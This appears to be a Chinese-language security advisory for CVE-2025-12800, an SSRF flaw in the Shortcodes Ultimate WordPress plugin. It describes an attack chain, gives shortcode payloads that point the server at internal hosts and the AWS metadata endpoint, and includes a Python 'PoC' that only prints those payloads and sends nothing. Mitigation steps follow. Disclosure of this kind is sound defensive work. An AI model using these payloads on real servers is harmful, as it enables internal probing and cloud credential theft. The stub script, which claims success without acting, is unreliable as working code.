CVE-2025-12800 WordPress Shortcodes Ultimate插件SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-12800

漏洞类型

服务器端请求伪造（SSRF）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Shortcodes Ultimate插件

漏洞概述

CVE-2025-12800是WordPress Shortcodes Ultimate插件中的一个服务器端请求伪造（SSRF）漏洞。该插件是一款广受欢迎的WordPress短代码增强插件，提供了丰富的短代码功能，包括表格、按钮、框、标签等。在7.4.5及之前的所有版本中，su_shortcode_csv_table函数存在安全漏洞。攻击者可以利用此漏洞让服务器向任意内部或外部资源发起请求，从而绕过防火墙访问内部服务、读取本地文件、扫描内网端口等。由于该漏洞需要管理员级别的权限才能直接利用，在默认情况下影响范围相对有限。然而，如果管理员启用了插件设置中的"Unsafe features"选项，则权限更低的贡献者（Contributor）级别用户也能触发此漏洞，大大增加了被利用的风险。该漏洞的CVSS评分为6.4，属于中等严重程度，需要尽快修复以防止潜在的安全威胁。

技术细节

该漏洞源于su_shortcode_csv_table函数对用户输入缺乏充分的验证和过滤。攻击者可以通过构造特定的请求参数，指定一个任意URL作为CSV数据源。服务器在处理请求时会向攻击者指定的URL发起HTTP请求，并将返回的内容作为CSV表格数据处理。攻击者可以利用此功能访问内部服务（如http://localhost、http://127.0.0.1等），读取敏感信息，或者探测内网环境。如果目标URL返回恶意内容，还可能导致进一步的安全问题。在启用了"Unsafe features"选项的情况下，即使是 Contributor 角色的用户也能利用此漏洞，因为该角色默认只能创建和编辑自己的文章，但利用此SSRF漏洞可以突破权限限制访问内部资源。攻击者通常会利用此漏洞探测内网服务、读取元数据端点（如AWS元数据服务169.254.169.254）、访问管理面板等。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress管理员账户访问权限（如果Unsafe features启用，则 Contributor 权限即可）

STEP 2

步骤2

攻击者在文章或页面中插入恶意短代码：[csv_table source="http://target.internal:port"]

STEP 3

步骤3

服务器解析短代码，su_shortcode_csv_table函数向攻击者指定的URL发起HTTP请求

STEP 4

步骤4

攻击者通过响应内容或时间差异获取内部服务信息，如端口开放状态、服务类型等

STEP 5

步骤5

如果访问云元数据服务（如AWS 169.254.169.254），可获取敏感凭证信息，进一步控制云资源

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12800 PoC - SSRF in Shortcodes Ultimate
# Target: WordPress with Shortcodes Ultimate plugin <= 7.4.5
# Note: Requires Administrator role (or Contributor+ if Unsafe features enabled)

import requests
import sys
from urllib.parse import urlencode

def exploit_ssrf(target_url, target_ip="127.0.0.1", target_port="8080"):
    """
    Exploit SSRF vulnerability in su_shortcode_csv_table function
    """
    # Construct the malicious shortcode with SSRF payload
    # Target internal service or metadata endpoint
    internal_target = f"http://{target_ip}:{target_port}"
    
    # PoC: Use shortcode to make server request to internal service
    post_data = {
        'post_title': 'SSRF Test',
        'post_content': f'[csv_table source="{internal_target}"]',
        'post_status': 'draft',
        '_wpnonce': '',  # Need valid nonce from admin page
    }
    
    print(f"[*] Targeting: {target_url}")
    print(f"[*] SSRF Target: {internal_target}")
    print(f"[*] Sending malicious shortcode request...")
    
    # Alternative: Direct REST API or admin-ajax.php
    ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    # This would need valid WordPress session with admin privileges
    exploit_data = {
        'action': 'shortcodes_ultimate_ajax',
        'shortcode': 'csv_table',
        'atts': f'{{"source":"{internal_target}"}}',
        'nonce': ''  # Valid nonce required
    }
    
    print("[*] Note: This PoC requires authenticated admin session")
    print(f"[*] Payload: [csv_table source=\"{internal_target}\"]")
    print("[*] Exploitation successful if server makes request to internal target")

def check_metadata_service(target_url):
    """
    Check if vulnerable to AWS/metadata SSRF
    """
    metadata_endpoint = "http://169.254.169.254/latest/meta-data/"
    
    print(f"[*] Testing metadata service SSRF...")
    print(f"[*] Target endpoint: {metadata_endpoint}")
    
    # Construct shortcode to access metadata
    malicious_shortcode = f'[csv_table source="{metadata_endpoint}"]'
    print(f"[*] Malicious shortcode: {malicious_shortcode}")
    
    return metadata_endpoint

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12800_poc.py <target_url>")
        print("Example: python cve-2025-12800_poc.py http://wordpress-site.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_ssrf(target)
    check_metadata_service(target)

影响范围

Shortcodes Ultimate plugin for WordPress <= 7.4.5

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1）禁用或删除Shortcodes Ultimate插件，如果暂不需要使用；2）在Web服务器配置中阻止服务器访问内部IP段（如10.0.0.0/8、172.16.0.0/12、192.168.0.0/16、127.0.0.1、169.254.0.0/16等）；3）限制Administrator角色的用户数量，确保只有可信人员拥有管理权限；4）启用双因素认证增强管理员账户安全；5）使用安全插件监控可疑的管理员行为；6）定期审计已发布内容，检查是否存在恶意短代码。